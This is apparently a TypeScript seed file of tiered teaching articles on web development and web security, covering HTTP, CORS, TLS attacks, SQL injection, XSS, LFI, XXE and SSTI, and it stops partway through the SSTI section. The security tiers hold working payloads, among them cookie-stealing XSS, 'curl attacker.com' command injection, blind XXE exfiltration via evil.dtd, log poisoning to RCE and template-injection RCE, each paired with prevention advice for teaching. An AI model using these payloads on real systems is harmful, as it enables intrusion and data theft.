import type { SeedArticle } from "./types";

export const WEB_ARTICLES: SeedArticle[] = [
  // ── web-fundamentals L0 ─────────────────────────────────────────────────
  {
    competencyId: "web-fundamentals",
    depthTier: 0,
    title: "Web Development Overview",
    recommendedLevel: 0,
    sections: [
      { heading: "What is web development", content: `Web development encompasses building applications that run over HTTP. The client (browser) sends requests; the server processes them and returns responses. Modern web apps use frontend frameworks (React, Vue) for UI and backend frameworks (Express, Django, Flask) for logic, data, and authentication.\n\nUnderstanding how the web works — HTTP, sessions, cookies, authentication — is prerequisite to both building secure applications and finding vulnerabilities in them.`, sortOrder: 0 },
      { heading: "The HTTP request/response cycle", content: `Every web interaction follows this pattern:\n\n\`\`\`\nClient → HTTP Request → Server\n  GET /page HTTP/1.1\n  Host: example.com\n  Cookie: session=abc123\n\nServer → HTTP Response → Client\n  HTTP/1.1 200 OK\n  Content-Type: text/html\n  Set-Cookie: session=xyz789\n  \n  <html>...</html>\n\`\`\`\n\nKey concepts: methods (GET, POST, PUT, DELETE), status codes (200 OK, 301 Redirect, 403 Forbidden, 404 Not Found, 500 Server Error), headers, cookies.`, sortOrder: 1 },
      { heading: "Key vocabulary", content: `- **Frontend**: Code running in the browser (HTML, CSS, JavaScript)\n- **Backend**: Server-side logic (routing, database queries, auth)\n- **API**: Application Programming Interface — structured endpoints for data exchange\n- **REST**: Representational State Transfer — architectural style using HTTP methods\n- **Session**: Server-side state tied to a client via a session cookie\n- **CORS**: Cross-Origin Resource Sharing — browser security mechanism\n- **TLS**: Transport Layer Security — encrypts HTTP into HTTPS`, sortOrder: 2 },
      { heading: "Sources", content: `- MDN Web Docs: developer.mozilla.org\n- RFC 7230-7235 (HTTP/1.1)\n- RFC 9110 (HTTP Semantics)`, sortOrder: 3 },
    ],
  },

  // ── web-fundamentals L1 ─────────────────────────────────────────────────
  {
    competencyId: "web-fundamentals",
    depthTier: 1,
    title: "Web Development Basics",
    recommendedLevel: 1,
    sections: [
      { heading: "HTTP methods and status codes", content: `\`\`\`bash\n# Common HTTP methods\nGET    /api/users          # Retrieve data\nPOST   /api/users          # Create resource\nPUT    /api/users/1         # Replace resource\nPATCH  /api/users/1         # Partial update\nDELETE /api/users/1         # Remove resource\n\n# Test with curl\ncurl -X GET http://example.com/api/users\ncurl -X POST http://example.com/api/users \\\\\n  -H "Content-Type: application/json" \\\\\n  -d '{"name": "test", "email": "test@example.com"}'\n\`\`\`\n\nStatus codes by category:\n- **2xx**: Success (200 OK, 201 Created, 204 No Content)\n- **3xx**: Redirection (301 Moved, 302 Found, 304 Not Modified)\n- **4xx**: Client error (400 Bad Request, 401 Unauthorized, 403 Forbidden, 404 Not Found)\n- **5xx**: Server error (500 Internal, 502 Bad Gateway, 503 Service Unavailable)`, sortOrder: 0 },
      { heading: "Cookies and sessions", content: `Cookies are key-value pairs the server sets in the browser:\n\n\`\`\`http\nSet-Cookie: session=abc123; HttpOnly; Secure; SameSite=Lax; Path=/; Max-Age=3600\n\`\`\`\n\nImportant cookie flags:\n- **HttpOnly**: Not accessible via JavaScript (prevents XSS cookie theft)\n- **Secure**: Only sent over HTTPS\n- **SameSite**: Controls cross-site sending (Lax, Strict, None)\n- **Path/Domain**: Scope of the cookie\n\nSessions typically work by storing a session ID in a cookie, with session data stored server-side.`, sortOrder: 1 },
      { heading: "Authentication patterns", content: `Common auth methods:\n\n- **Session-based**: Login sets a session cookie, server validates on each request\n- **Token-based (JWT)**: Server returns a signed token, client sends in Authorization header\n- **OAuth 2.0**: Delegated auth — "Login with Google/GitHub"\n- **API keys**: Static tokens for machine-to-machine auth\n\n\`\`\`bash\n# JWT in Authorization header\ncurl -H "Authorization: Bearer eyJhbGciOiJIUzI1NiJ9..." http://api.example.com/users\n\n# Basic auth\ncurl -u admin:password http://api.example.com/admin\n# Sends: Authorization: Basic YWRtaW46cGFzc3dvcmQ=\n\`\`\``, sortOrder: 2 },
      { heading: "Database fundamentals", content: `Most web apps store data in databases:\n\n\`\`\`sql\n-- Relational (SQL)\nSELECT * FROM users WHERE email = 'user@example.com';\nINSERT INTO users (name, email) VALUES ('test', 'test@example.com');\nUPDATE users SET name = 'updated' WHERE id = 1;\nDELETE FROM users WHERE id = 1;\n\`\`\`\n\nCommon databases: PostgreSQL, MySQL, SQLite (relational); MongoDB, Redis (non-relational). Understanding SQL is essential for both development and SQL injection testing.`, sortOrder: 3 },
      { heading: "Sources", content: `- MDN Web Docs: HTTP, Cookies, Authentication\n- RFC 6749 (OAuth 2.0)\n- RFC 7519 (JSON Web Tokens)\n- OWASP Authentication Cheat Sheet`, sortOrder: 4 },
    ],
  },

  // ── web-fundamentals L2 ─────────────────────────────────────────────────
  {
    competencyId: "web-fundamentals",
    depthTier: 2,
    title: "Web Development in Depth",
    recommendedLevel: 2,
    sections: [
      { heading: "Server architecture patterns", content: `\`\`\`mermaid\nflowchart LR\n    Client -->|HTTPS| LB[Load Balancer]\n    LB --> App1[App Server 1]\n    LB --> App2[App Server 2]\n    App1 --> DB[(Database)]\n    App2 --> DB\n    App1 --> Cache[(Redis Cache)]\n    App2 --> Cache\n\`\`\`\n\nCommon patterns:\n- **Reverse proxy** (nginx, Caddy): TLS termination, static files, load balancing\n- **Application server**: Handles business logic (Node.js, Python/Gunicorn, Go)\n- **Database**: Persistent storage with connection pooling\n- **Cache layer**: Redis/Memcached for frequently accessed data\n- **Message queue**: Async processing (RabbitMQ, Redis Streams)`, sortOrder: 0 },
      { heading: "HTTP headers for security", content: `\`\`\`http\n# Content Security Policy — controls what resources can load\nContent-Security-Policy: default-src 'self'; script-src 'self'; style-src 'self' 'unsafe-inline'\n\n# Prevent MIME type sniffing\nX-Content-Type-Options: nosniff\n\n# Clickjacking protection\nX-Frame-Options: DENY\n\n# Force HTTPS\nStrict-Transport-Security: max-age=31536000; includeSubDomains\n\n# Referrer policy\nReferrer-Policy: strict-origin-when-cross-origin\n\n# Permissions policy\nPermissions-Policy: camera=(), microphone=(), geolocation=()\n\`\`\`\n\nThese headers are defense-in-depth measures. Missing security headers are a common finding in web assessments.`, sortOrder: 1 },
      { heading: "CORS in detail", content: `> **First: the Same-Origin Policy (SOP).** The browser enforces a fundamental rule: JavaScript on page A can only read responses from the *same origin* as A. An origin = scheme + host + port (e.g., \\\`https://app.example.com:443\\\`). If a script on \\\`https://app.example.com\\\` fetches \\\`https://api.example.com/data\\\`, the browser blocks reading the response — different host, different origin. Without SOP, any page you visit could silently read your banking session. CORS is the *controlled exception* — a way for the server to say "this other origin is allowed to read my responses."

CORS (Cross-Origin Resource Sharing) controls which origins can make requests to your API:\n\n\`\`\`\n# Preflight request (browser sends automatically for non-simple requests)\nOPTIONS /api/data HTTP/1.1\nOrigin: https://app.example.com\nAccess-Control-Request-Method: POST\nAccess-Control-Request-Headers: Content-Type, Authorization\n\n# Server response\nHTTP/1.1 204 No Content\nAccess-Control-Allow-Origin: https://app.example.com\nAccess-Control-Allow-Methods: GET, POST, OPTIONS\nAccess-Control-Allow-Headers: Content-Type, Authorization\nAccess-Control-Max-Age: 86400\n\`\`\`\n\nDangerous misconfiguration: \`Access-Control-Allow-Origin: *\` with \`Access-Control-Allow-Credentials: true\` allows any site to make authenticated requests.`, sortOrder: 2 },
      { heading: "WebSockets and real-time communication", content: `WebSockets provide full-duplex communication over a single TCP connection:\n\n\`\`\`javascript\n// Client\nconst ws = new WebSocket('wss://api.example.com/ws');\nws.onopen = () => ws.send(JSON.stringify({ type: 'subscribe', channel: 'updates' }));\nws.onmessage = (event) => console.log(JSON.parse(event.data));\n\`\`\`\n\n\`\`\`\n# WebSocket upgrade handshake\nGET /ws HTTP/1.1\nUpgrade: websocket\nConnection: Upgrade\nSec-WebSocket-Key: dGhlIHNhbXBsZSBub25jZQ==\nSec-WebSocket-Version: 13\n\nHTTP/1.1 101 Switching Protocols\nUpgrade: websocket\nConnection: Upgrade\nSec-WebSocket-Accept: s3pPLMBiTxaQ9kYGzzhZRbK+xOo=\n\`\`\`\n\nSecurity: WebSockets bypass same-origin policy after the initial handshake. Validate the Origin header server-side. WSS (WebSocket Secure) is WS over TLS — like HTTPS is HTTP over TLS — there is no WebSocket-specific encryption layer. The frame masking in RFC 6455 §10.3 is an anti-cache-poisoning measure, not encryption. Always use WSS in production.`, sortOrder: 3 },
      { heading: "API design and documentation", content: `RESTful API conventions:\n\n| Method | Endpoint | Action |\n|--------|----------|--------|\n| GET | /api/users | List all users |\n| GET | /api/users/:id | Get one user |\n| POST | /api/users | Create user |\n| PUT | /api/users/:id | Replace user |\n| PATCH | /api/users/:id | Update user |\n| DELETE | /api/users/:id | Delete user |\n\nPagination: \`/api/users?page=2&limit=20\`\nFiltering: \`/api/users?role=admin&active=true\`\nSorting: \`/api/users?sort=-created_at\` (prefix \`-\` for descending)\n\nAlways validate and sanitize input. Never trust client-supplied data, even from authenticated users.`, sortOrder: 4 },
      { heading: "Sources", content: `- MDN Web Docs: CORS, CSP, WebSockets\n- RFC 6455 (WebSocket Protocol)\n- OWASP Secure Headers Project\n- RFC 9110 (HTTP Semantics)`, sortOrder: 5 },
    ],
  },

  // ── web-fundamentals L3-L5 (condensed) ──────────────────────────────────
  {
    competencyId: "web-fundamentals",
    depthTier: 3,
    title: "Advanced Web Architecture",
    recommendedLevel: 3,
    sections: [
      { heading: "Microservices and service mesh", content: `Microservices decompose applications into independently deployable services:\n\n\`\`\`mermaid\nflowchart TB\n    GW[API Gateway] --> Auth[Auth Service]\n    GW --> Users[User Service]\n    GW --> Orders[Order Service]\n    Users --> DB1[(User DB)]\n    Orders --> DB2[(Order DB)]\n    Orders --> MQ[Message Queue]\n    MQ --> Notify[Notification Service]\n\`\`\`\n\nSecurity implications:\n- **Service-to-service auth**: mTLS (mutual TLS) or JWT tokens between services\n- **API Gateway**: Centralized auth, rate limiting, input validation\n- **Secret management**: Each service needs credentials — use Vault or cloud KMS\n- **Attack surface**: More services = more endpoints = more potential vulnerabilities\n- **East-west traffic**: Internal service communication often lacks the same scrutiny as external-facing endpoints`, sortOrder: 0 },
      { heading: "Server-side rendering and edge computing", content: `Modern architectures blur the client/server line:\n\n- **SSR (Server-Side Rendering)**: HTML generated on the server per-request (Next.js, Nuxt)\n- **SSG (Static Site Generation)**: HTML pre-built at build time\n- **ISR (Incremental Static Regeneration)**: Cached static pages with background refresh\n- **Edge Functions**: Code runs at CDN edge locations (Cloudflare Workers, Vercel Edge)\n\nSecurity considerations:\n- SSR components have direct database access — SQL injection risk\n- Edge functions have limited capabilities but run closer to users\n- Hydration mismatches between server and client can leak data`, sortOrder: 1 },
      { heading: "GraphQL security", content: `GraphQL introduces unique attack vectors:\n\n\`\`\`graphql\n# Introspection query — reveals entire schema\n{ __schema { types { name fields { name type { name } } } } }\n\n# Nested query DoS (query depth attack)\n{ user { friends { friends { friends { friends { name } } } } } }\n\n# Batched queries\n[{ "query": "{ user(id:1) { password } }" },\n { "query": "{ user(id:2) { password } }" }]\n\`\`\`\n\nDefenses: disable introspection in production, set query depth limits, implement query cost analysis, use persisted queries, apply field-level authorization.`, sortOrder: 2 },
      { heading: "Caching strategies and security", content: `Cache-related vulnerabilities:\n\n- **Web cache poisoning**: Manipulate unkeyed inputs (headers, cookies) to poison cached responses\n- **Cache deception**: Trick the cache into storing a victim's authenticated page at a public URL\n\n\`\`\`bash\n# Cache poisoning via X-Forwarded-Host\ncurl -H "X-Forwarded-Host: evil.com" https://target.com/\n# If the response includes evil.com in links and gets cached,\n# subsequent users get the poisoned version\n\n# Cache deception\n# If /account doesn't cache but /account/nonexistent.css does:\nhttps://target.com/account/nonexistent.css\n# Some path-based caches store the authenticated /account response\n\`\`\``, sortOrder: 3 },
      { heading: "Sources", content: `- OWASP REST Security Cheat Sheet\n- GraphQL specification: spec.graphql.org\n- James Kettle, "Practical Web Cache Poisoning" (PortSwigger Research)\n- RFC 9111 (HTTP Caching)`, sortOrder: 4 },
    ],
  },
  {
    competencyId: "web-fundamentals",
    depthTier: 4,
    title: "Web Platform Internals",
    recommendedLevel: 4,
    sections: [
      { heading: "Browser security model", content: `The browser enforces several security boundaries:\n\n**Same-Origin Policy (SOP)**: Scripts from origin A cannot access data from origin B. An origin is scheme + host + port.\n\n**Content Security Policy (CSP)**: Server-specified allowlists for script sources, frame ancestors, form actions. CSP bypasses are a research area — common techniques include JSONP endpoints, CDN-hosted libraries, and base-tag injection.\n\n**Subresource Integrity (SRI)**: Verify CDN-hosted scripts haven't been tampered with:\n\`\`\`html\n<script src="https://cdn.example.com/lib.js"\n  integrity="sha384-oqVuAfXRKap7fdgcCY5uykM6+R9GqQ8K/uxy9rx7HNQlGYl1kPzQho1wx4JwY8w"\n  crossorigin="anonymous"></script>\n\`\`\`\n\n**Site Isolation**: Each origin gets its own renderer process — mitigates Spectre-class side-channel attacks.`, sortOrder: 0 },
      { heading: "HTTP/2 and HTTP/3", content: `HTTP/2 (RFC 9113): Binary framing, multiplexing (multiple requests on one connection), header compression (HPACK), server push.\n\nHTTP/3 (RFC 9114): Uses QUIC (UDP-based) instead of TCP. Benefits: faster connection setup (0-RTT), better performance on lossy networks, built-in encryption.\n\n\`\`\`bash\n# Check HTTP version support\ncurl -I --http2 https://example.com\ncurl --http3 https://example.com  # requires curl with quiche or ngtcp2\n\n# HTTP/2 specific attacks:\n# - HTTP/2 request smuggling (desync via header manipulation)\n# - HPACK bomb (compressed headers that expand massively)\n# - Stream prioritization DoS\n\`\`\`\n\nHTTP/2 smuggling exploits differences between how frontend proxies and backend servers parse HTTP/2 frames — a technique pioneered by James Kettle at PortSwigger.`, sortOrder: 1 },
      { heading: "Web Assembly security", content: `WebAssembly (Wasm) runs compiled code in the browser at near-native speed:\n\n- Runs in a sandboxed environment (can't access DOM directly, no raw memory access outside its linear memory)\n- Used for: crypto mining (malicious), password cracking, image processing, game engines\n- Can be decompiled to WAT (WebAssembly Text format) for analysis\n\n\`\`\`bash\n# Decompile Wasm to readable format\nwasm2wat module.wasm -o module.wat\n\n# Analyze with wasm-objdump\nwasm-objdump -x module.wasm  # show section details\nwasm-objdump -d module.wasm  # disassemble\n\`\`\`\n\nSecurity: Wasm is sandboxed but can still perform timing attacks, and bugs in the Wasm runtime itself could allow sandbox escape.`, sortOrder: 2 },
      { heading: "Sources", content: `- RFC 9113 (HTTP/2), RFC 9114 (HTTP/3), RFC 9000 (QUIC)\n- W3C WebAssembly specification\n- James Kettle, "HTTP/2: The Sequel is Always Worse" (PortSwigger)\n- MDN Web Docs: Same-Origin Policy, CSP`, sortOrder: 3 },
    ],
  },
  {
    competencyId: "web-fundamentals",
    depthTier: 5,
    title: "Web Internals Expert Reference",
    recommendedLevel: 5,
    sections: [
      { heading: "JavaScript engine internals", content: `V8 (Chrome/Node.js) compiles JavaScript through multiple tiers:\n\n\`\`\`\nSource → Parser → AST → Ignition (bytecode interpreter)\n   → Sparkplug (baseline compiler) → Maglev → Turbofan (optimizing JIT)\n\`\`\`\n\nJIT compilation creates security risks:\n- **Type confusion**: JIT assumes types based on profiling; incorrect assumptions create memory safety bugs\n- **JIT spraying**: Embed shellcode in JIT-compiled constants\n- **V8 CVEs**: Regular stream of sandbox escape bugs (exploitable via malicious JS)\n\nMitigation: V8 sandbox (isolates V8 heap from the rest of process memory), pointer compression, CFI (Control Flow Integrity).`, sortOrder: 0 },
      { heading: "TLS implementation attacks", content: `> **Cryptographic prerequisites.** CBC (Cipher Block Chaining) is a block cipher mode where each plaintext block is XORed with the previous ciphertext block before encryption — this chaining means a bit error propagates, which is both a feature (integrity) and an attack surface (padding oracles). A **padding oracle** is when the server leaks whether decrypted padding is valid — an attacker can decrypt ciphertext byte-by-byte by observing error responses. A **compression oracle** exploits the fact that repeated strings compress better: if an attacker can inject a guess next to a secret and the compressed size shrinks, the guess matches part of the secret. **Bleichenbacher's attack** targets RSA PKCS#1 v1.5 padding in key exchange: by sending thousands of modified ciphertexts and observing which ones the server accepts as valid padding, the attacker can eventually recover the plaintext session key. See *Cryptography L2-L3* for detailed treatment.

Historical and current TLS weaknesses:\n\n| Attack | Targets | Technique |\n|--------|---------|----------|\n| BEAST | TLS 1.0 CBC | Chosen-plaintext via block boundary |\n| CRIME/BREACH | TLS compression | Compression oracle leaks secrets |\n| POODLE | SSLv3 | Padding oracle on CBC |\n| Heartbleed | OpenSSL | Buffer over-read in heartbeat extension |\n| ROBOT | RSA key exchange | Bleichenbacher padding oracle |\n| ALPACA | Cross-protocol | Redirect TLS to wrong application protocol |\n\n\`\`\`bash\n# Test for common TLS issues\ntestssl.sh --full https://target.com\n\n# Check certificate transparency logs\ncurl "https://crt.sh/?q=%.target.com&output=json" | jq .[].name_value\n\`\`\`\n\nCertificate transparency (CT) logs record all issued certificates — useful for finding subdomains and detecting misissued certificates.`, sortOrder: 1 },
      { heading: "Browser exploit chains", content: `A browser exploit chain typically involves:\n\n1. **Renderer exploit**: Memory corruption in V8, Blink, or a media codec — achieves code execution in the renderer sandbox\n2. **Sandbox escape**: Exploit an IPC vulnerability to escape the renderer process — target the browser kernel process or a privileged service\n3. **Privilege escalation**: Kernel exploit for full system access\n\nMitigations:\n- Site isolation (process per origin)\n- V8 sandbox (heap isolation)\n- MiraclePtr (use-after-free protection)\n- CFI (prevents control flow hijacking)\n- Renderer process is heavily sandboxed (seccomp on Linux, seatbelt on macOS)`, sortOrder: 2 },
      { heading: "Sources", content: `- V8 blog: v8.dev\n- PortSwigger Research: portswigger.net/research\n- testssl.sh documentation\n- Chromium security architecture: chromium.org/Home/chromium-security\n- Certificate Transparency: certificate.transparency.dev`, sortOrder: 3 },
    ],
  },

  // ── web-security L0 ─────────────────────────────────────────────────────
  {
    competencyId: "web-security",
    depthTier: 0,
    title: "Web Application Security Overview",
    recommendedLevel: 0,
    sections: [
      { heading: "What is web application security", content: `Web application security focuses on finding and preventing vulnerabilities in web apps. The OWASP (Open Worldwide Application Security Project) maintains the industry-standard list of critical web risks — the OWASP Top 10.\n\nWeb vulnerabilities consistently rank among the most exploited attack vectors. A single SQL injection can expose an entire database; a single XSS can steal every user's session.`, sortOrder: 0 },
      { heading: "The OWASP Top 10 (2021)", content: `1. **Broken Access Control** — Users access unauthorized resources\n2. **Cryptographic Failures** — Sensitive data exposed due to weak crypto\n3. **Injection** — SQL, NoSQL, OS, LDAP injection\n4. **Insecure Design** — Architectural flaws\n5. **Security Misconfiguration** — Default configs, verbose errors\n6. **Vulnerable Components** — Outdated libraries with known CVEs\n7. **Authentication Failures** — Credential stuffing, weak passwords\n8. **Software and Data Integrity Failures** — Unsigned updates, CI/CD compromise\n9. **Logging and Monitoring Failures** — Attacks go undetected\n10. **Server-Side Request Forgery (SSRF)** — Server makes requests to unintended destinations`, sortOrder: 1 },
      { heading: "Key vocabulary", content: `- **XSS**: Cross-Site Scripting — injecting JavaScript into web pages\n- **SQLi**: SQL Injection — manipulating database queries\n- **CSRF**: Cross-Site Request Forgery — forging authenticated actions\n- **SSRF**: Server-Side Request Forgery — making the server fetch unintended URLs\n- **IDOR**: Insecure Direct Object Reference — accessing other users' resources by changing IDs\n- **LFI/RFI**: Local/Remote File Inclusion — including unintended files`, sortOrder: 2 },
      { heading: "Sources", content: `- OWASP Top 10 (2021): owasp.org/Top10\n- OWASP Testing Guide v4.2\n- CWE (Common Weakness Enumeration): cwe.mitre.org`, sortOrder: 3 },
    ],
  },

  // ── web-security L1 ─────────────────────────────────────────────────────
  {
    competencyId: "web-security",
    depthTier: 1,
    title: "Web Security Basics",
    recommendedLevel: 1,
    sections: [
      { heading: "SQL injection fundamentals", content: `SQL injection occurs when user input is concatenated into SQL queries without sanitization:\n\n\`\`\`sql\n-- Vulnerable query (PHP)\n$query = "SELECT * FROM users WHERE username = '$input'";\n\n-- Attack: input = ' OR 1=1--\nSELECT * FROM users WHERE username = '' OR 1=1--'\n-- Returns all users\n\n-- Authentication bypass: input = admin'--\nSELECT * FROM users WHERE username = 'admin'--' AND password = '...'\n-- Ignores password check\n\`\`\`\n\n\`\`\`bash\n# Test with sqlmap\nsqlmap -u "http://target.com/page?id=1" --dbs\nsqlmap -u "http://target.com/page?id=1" -D dbname --tables\nsqlmap -u "http://target.com/page?id=1" -D dbname -T users --dump\n\`\`\`\n\nPrevention: always use parameterized queries (prepared statements), never string concatenation.`, sortOrder: 0 },
      { heading: "Cross-Site Scripting (XSS)", content: `XSS injects JavaScript into web pages viewed by other users:\n\n**Reflected XSS**: Input reflected in the response\n\`\`\`\nhttp://target.com/search?q=<script>alert(document.cookie)</script>\n\`\`\`\n\n**Stored XSS**: Input stored in the database, rendered to all viewers\n\`\`\`html\n<!-- In a comment field -->\n<img src=x onerror=fetch('https://attacker.com/steal?c='+document.cookie)>\n\`\`\`\n\n**DOM-based XSS**: Client-side JS processes untrusted data\n\`\`\`javascript\n// Vulnerable: uses location.hash directly\ndocument.getElementById('output').innerHTML = location.hash.slice(1);\n\`\`\`\n\nPrevention: output encoding (HTML entities), Content Security Policy, input validation.`, sortOrder: 1 },
      { heading: "Broken access control", content: `The most common vulnerability class. Examples:\n\n\`\`\`bash\n# IDOR — change the ID to access another user's data\nGET /api/users/123/profile  # Your profile\nGET /api/users/124/profile  # Someone else's profile (should be denied)\n\n# Privilege escalation — change role parameter\nPOST /api/users/register\n{\"username\": \"hacker\", \"role\": \"admin\"}\n\n# Forced browsing — access admin pages directly\nGET /admin/dashboard  # No auth check on the route\n\`\`\`\n\nPrevention: check authorization on every request (not just the UI), deny by default, use role-based access control.`, sortOrder: 2 },
      { heading: "CSRF and SSRF basics", content: `**CSRF** (Cross-Site Request Forgery): Trick a logged-in user into making unintended requests:\n\`\`\`html\n<!-- On attacker's page -->\n<form action="https://bank.com/transfer" method="POST">\n  <input name="to" value="attacker">\n  <input name="amount" value="10000">\n</form>\n<script>document.forms[0].submit()</script>\n\`\`\`\nPrevention: CSRF tokens, SameSite cookies.\n\n**SSRF** (Server-Side Request Forgery): Make the server fetch internal resources:\n\`\`\`bash\n# If the app fetches a user-supplied URL:\nPOST /api/fetch-url\n{\"url\": \"http://169.254.169.254/latest/meta-data/iam/security-credentials/\"}\n# Accesses AWS metadata service from inside the network\n\`\`\`\nPrevention: allowlist URLs, block private IP ranges, use network segmentation.`, sortOrder: 3 },
      { heading: "Sources", content: `- OWASP Testing Guide v4.2\n- OWASP Cheat Sheet Series: cheatsheetseries.owasp.org\n- PortSwigger Web Security Academy: portswigger.net/web-security\n- CWE-89 (SQL Injection), CWE-79 (XSS), CWE-352 (CSRF)`, sortOrder: 4 },
    ],
  },

  // ── web-security L2 ─────────────────────────────────────────────────────
  {
    competencyId: "web-security",
    depthTier: 2,
    title: "Web Security Testing in Depth",
    recommendedLevel: 2,
    sections: [
      { heading: "Burp Suite workflow", content: `Burp Suite is the standard web security testing tool:\n\n1. **Proxy**: Intercept and modify requests between browser and server\n2. **Repeater**: Manually modify and resend individual requests\n3. **Intruder**: Automated parameter fuzzing (positions + payloads)\n4. **Decoder**: Encode/decode data (Base64, URL, HTML entities)\n5. **Comparer**: Diff two responses to spot differences\n\n\`\`\`\n# Typical testing workflow:\n1. Browse the target through Burp Proxy → build site map\n2. Review interesting requests in HTTP History\n3. Send to Repeater → manually test parameters\n4. Find injection point → send to Intruder for automation\n5. Analyze responses for anomalies\n\`\`\`\n\nKey Burp extensions: Autorize (access control testing), JWT Editor, Param Miner, Active Scan++.`, sortOrder: 0 },
      { heading: "Advanced SQL injection", content: `Beyond basic injection:\n\n\`\`\`sql\n-- UNION-based extraction\n' UNION SELECT username, password FROM users--\n\n-- Determine column count\n' ORDER BY 5--  -- increment until error\n\n-- Error-based extraction (MySQL)\n' AND extractvalue(1, concat(0x7e, (SELECT version())))--\n\n-- Boolean-based blind\n' AND (SELECT SUBSTRING(username,1,1) FROM users LIMIT 1)='a'--\n\n-- Time-based blind\n' AND IF(1=1, SLEEP(5), 0)--\n\`\`\`\n\nSecond-order SQLi: data stored safely but used unsafely later. Example: register with username \`admin'--\`, then trigger a query that uses the stored username without parameterization.`, sortOrder: 1 },
      { heading: "File inclusion and path traversal", content: `\`\`\`bash\n# Local File Inclusion (LFI)\nhttp://target.com/page?file=../../../../etc/passwd\nhttp://target.com/page?file=....//....//....//etc/passwd  # bypass basic filters\nhttp://target.com/page?file=php://filter/convert.base64-encode/resource=config.php\n\n# Null byte injection (older PHP versions)\nhttp://target.com/page?file=../../../../etc/passwd%00\n\n# Log poisoning → LFI to RCE\n# 1. Inject PHP into User-Agent header\ncurl -A "<?php system(\\$_GET['cmd']); ?>" http://target.com/\n# 2. Include the access log\nhttp://target.com/page?file=/var/log/apache2/access.log&cmd=id\n\`\`\`\n\nPrevention: never use user input in file paths, use allowlists, chroot application directories.`, sortOrder: 2 },
      { heading: "Authentication and session attacks", content: `\`\`\`bash\n# Session fixation: set a known session ID before the user logs in\n# If the app doesn't regenerate the session on login, the attacker\n# knows the authenticated session ID\n\n# JWT attacks\n# None algorithm\n# Change alg to "none", remove signature\n# {\"alg\":\"none\",\"typ\":\"JWT\"}.{\"sub\":\"admin\"}\n\n# Key confusion: change RS256 to HS256, sign with the public key\n# Tools: jwt_tool\npython3 jwt_tool.py <token> -X a  # algorithm confusion attack\npython3 jwt_tool.py <token> -T    # tamper mode\n\n# Password reset poisoning\nPOST /forgot-password\nHost: attacker.com\n{\"email\": \"victim@target.com\"}\n# If the app uses the Host header in the reset link...\n\`\`\``, sortOrder: 3 },
      { heading: "Command injection", content: `When user input reaches system commands:\n\n\`\`\`bash\n# Basic command injection\n; id\n| id\n\\$(id)\n\\\`id\\\`\n\n# In a ping utility: input = "127.0.0.1; cat /etc/passwd"\nping -c 1 127.0.0.1; cat /etc/passwd\n\n# Blind injection (no output visible)\n; sleep 5  # time-based\n; curl attacker.com/$(whoami)  # out-of-band\n; ping -c 1 attacker.com  # DNS callback\n\`\`\`\n\nPrevention: avoid system() calls with user input, use language-native libraries instead (e.g., Python's subprocess with list arguments, not shell=True).`, sortOrder: 4 },
      { heading: "XML External Entity (XXE)", content: `XXE exploits XML parsers that process external entity declarations (OWASP A05:2021 Security Misconfiguration).\n\n\`\`\`mermaid\nsequenceDiagram\n    participant A as Attacker\n    participant S as Vulnerable Server\n    participant F as Local Files\n    participant E as Attacker Server\n    A->>S: POST XML with malicious DOCTYPE\n    Note over S: Parser resolves external entity\n    S->>F: Read /etc/passwd (file:// entity)\n    F-->>S: File contents\n    S-->>A: Response contains file contents\n    Note over A,E: Blind XXE (no direct output):\n    A->>S: POST XML referencing external DTD\n    S->>E: Fetch malicious DTD\n    E-->>S: DTD that exfiltrates via HTTP\n    S->>E: GET /?data=file_contents\n\`\`\`\n\n\`\`\`xml\n<!-- Classic XXE: file read -->\n<?xml version=\"1.0\"?>\n<!DOCTYPE foo [\n  <!ENTITY xxe SYSTEM \"file:///etc/passwd\">\n]>\n<root>&xxe;</root>\n\n<!-- SSRF via XXE -->\n<!DOCTYPE foo [\n  <!ENTITY xxe SYSTEM \"http://169.254.169.254/latest/meta-data/\">\n]>\n\n<!-- Billion laughs (DoS) -->\n<!DOCTYPE lolz [\n  <!ENTITY lol \"lol\">\n  <!ENTITY lol2 \"&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;\">\n  <!ENTITY lol3 \"&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;\">\n]>\n\`\`\`\n\n**Blind XXE with out-of-band exfiltration**:\n\`\`\`xml\n<!-- Step 1: Send payload referencing attacker DTD -->\n<!DOCTYPE foo [<!ENTITY % xxe SYSTEM \"http://attacker.com/evil.dtd\"> %xxe;]>\n\n<!-- Step 2: evil.dtd on attacker server -->\n<!ENTITY % file SYSTEM \"file:///etc/hostname\">\n<!ENTITY % eval \"<!ENTITY &#x25; exfil SYSTEM 'http://attacker.com/?d=%file;'>\">\n%eval; %exfil;\n\`\`\`\n\n**Mitigations by language** (source: OWASP XXE Prevention Cheat Sheet):\n- **Java**: \`factory.setFeature(\"http://apache.org/xml/features/disallow-doctype-decl\", true)\`\n- **PHP**: \`libxml_disable_entity_loader(true)\` (PHP < 8.0); PHP 8.0+ disables external entities by default\n- **Python**: use \`defusedxml\` (\`import defusedxml.ElementTree as ET\`) — blocks entities, DTDs, and expansion\n- **.NET**: \`XmlReaderSettings.DtdProcessing = DtdProcessing.Prohibit\``, sortOrder: 5 },
      { heading: "Sources", content: `- PortSwigger Web Security Academy\n- OWASP Testing Guide v4.2\n- OWASP XXE Prevention Cheat Sheet: cheatsheetseries.owasp.org\n- PayloadsAllTheThings: github.com/swisskyrepo/PayloadsAllTheThings\n- Burp Suite documentation: portswigger.net/burp/documentation`, sortOrder: 6 },
    ],
  },

  // ── web-security L3-L5 ──────────────────────────────────────────────────
  {
    competencyId: "web-security",
    depthTier: 3,
    title: "Advanced Web Exploitation",
    recommendedLevel: 3,
    sections: [
      { heading: "Server-Side Template Injection (SSTI)", content: `When user input is rendered by a server-side template engine:\n\n\`\`\`python\n# Jinja2 (Python)\n{{7*7}}  # returns 49 — confirms SSTI\n{{config.items()}}  # leak configuration\n{{''.__class__.__mro__[1].__subclasses__()}}  # enumerate classes\n# Find subprocess.Popen or os.system for RCE\n\n# Twig (PHP)\n{{_self.env.registerUndefinedFilterCallback("exec")}}{{_self.env.getFilter("id")}}\n\n# Freemarker (Java)\n<#assign ex=\"freemarker.template.utility.Execute\"?new()> \${ ex("id") }\n\`\`\`\n\nDetection: inject mathematical expressions and template syntax for various engines. Tools: tplmap automates detection and exploitation.`, sortOrder: 0 },
